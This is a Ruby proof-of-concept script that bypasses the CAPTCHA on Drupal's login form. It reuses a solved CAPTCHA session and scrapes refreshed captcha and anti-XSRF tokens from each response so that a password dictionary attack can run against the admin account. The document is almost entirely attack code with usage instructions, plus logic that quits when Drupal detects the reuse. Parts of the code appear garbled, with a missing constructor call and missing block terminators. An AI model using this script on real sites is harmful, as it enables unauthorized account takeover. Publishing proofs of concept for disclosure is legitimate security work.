This is a proof of concept to demonstrate a logic security flow in the way Drupal CAPTCHA is used to protect login forms from bruteforce. If the CAPTCHA challenge is solved, the next login attempts can be issued without solving any new CAPTCHA challenge.
# Drupal Captcha bruteforcing bypass
# This is a Proof Of Concept to demonstrate a logic security flow
# in the way drupal captcha is used to protect login forms
# from bruteforce. If the captcha challenge is solved, the next
# login attempts can be issued without solving any new captcha challenge.
# Usage: change URL, PATH, USERAGENT as you need.
# Change cookie, captcha_sid, captcha_token, form_build_id with the values
# you got in the html response AFTER the captcha is solved. This is needed
# in order to issue the first request as valid.
# Unique tokens will be then updated automatically .
# author: Michele "antisnatchor" Orru'
require "net/http"
require "net/https"
require "erb"
require "singleton"
require "rubygems"
require "nokogiri"
URL = ''
PATH = '/user'
USERAGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv: Gecko/20101203 Firefox/3.6.13'
# easy to enhance this reading list from a file, but this is just a PoC
USERNAME_LIST = ['admin']
PASSWD_LIST = ['test1', 'test2', 'test3', 'guessme']
# these are the session values needed to create valid http requests, after
# the reCaptcha has been solved the first time, leaving the login form
# without a new captcha challenge
cookie = "SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;"
captcha_sid = "476"
form_id = "user_login"
# these anti-XSRF tokens will change for every http response,
# so nokogiri is used to parse the html response in order to create
# the next http request with the valid anti-xsrf/captcha tokens.
# These initial values will be changed accordingly and automatically
# for each request .
captcha_token = "d853d6df05f6c6a956a46f20c8fe20aa"
form_build_id = "form-43fb0bcbcb140066a782a3fc23ab1ab7"
authenticated = false;
@http =, 80)
@http.use_ssl = false
puts "+Initial xsrf token [" + form_build_id + "]"
puts "+Initial captcha token [" + captcha_token + "]"
puts "+Dictionary attack with [" + PASSWD_LIST.size.to_s + "] passwords"
# I'm learning ruby :-)
passwd_counter = 0
while !authenticated && passwd_counter < PASSWD_LIST.size do
puts "+Testing password [" + PASSWD_LIST[passwd_counter] + "]"
post_data = "name=" + USERNAME_LIST[0] + "&pass=" + PASSWD_LIST[passwd_counter] + "&form_build_id=" + form_build_id +
"&form_id=" + form_id + "&captcha_sid="+ captcha_sid +
"&captcha_token=" + captcha_token + "&op=Log+in"
@headers = {
'Cookie' => cookie,
'Referer' => 'http://' + URL + PATH,
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => USERAGENT
puts "+Request headers = " + @headers.inspect
resp, data = @http.post2(PATH, post_data, @headers)
# loads the response in nokogiri to parse anti-XSRF tokens
doc = Nokogiri::HTML(data)
puts '+Code = ' + resp.code
puts '+Message = ' + resp.message
# "debug" code
#puts "=================================================== raw response START ======================================================="
#puts data
#puts "=================================================== raw response END ======================================================="
if data.index("CAPTCHA session reuse attack detected") != nil
puts "Doh', we've been detected by Drupal...quitting now"
if data.index("Sorry, unrecognized username or password") == nil && resp.code == "302"
# if credentials will be valid, there will be a 302 response with
# a new location header, corresponding to the user home page ( for instance)
authenticated = true
#parse the anti-xsrf and captcha tokens from the response
doc.css('input[id^=form]').each do |form_build_id|
form_build_id = form_build_id['id']
puts "+New xsrf token [" + form_build_id + "]"
doc.css('input[id^=edit-captcha-token]').each do |captcha_token_id|
captcha_token = captcha_token_id['value']
puts "+New captcha token [" + captcha_token + "]"
# I'm still learning ruby :-)
passwd_counter = passwd_counter + 1;
break if authenticated == true
if authenticated
puts "+Succesfully authenticated user[" + USERNAME_LIST[0] + "] with password [" + PASSWD_LIST[passwd_counter] + "]"
puts "+No passwords are valid for user [" + USERNAME_LIST[0] + "]. Dictionary attack failed."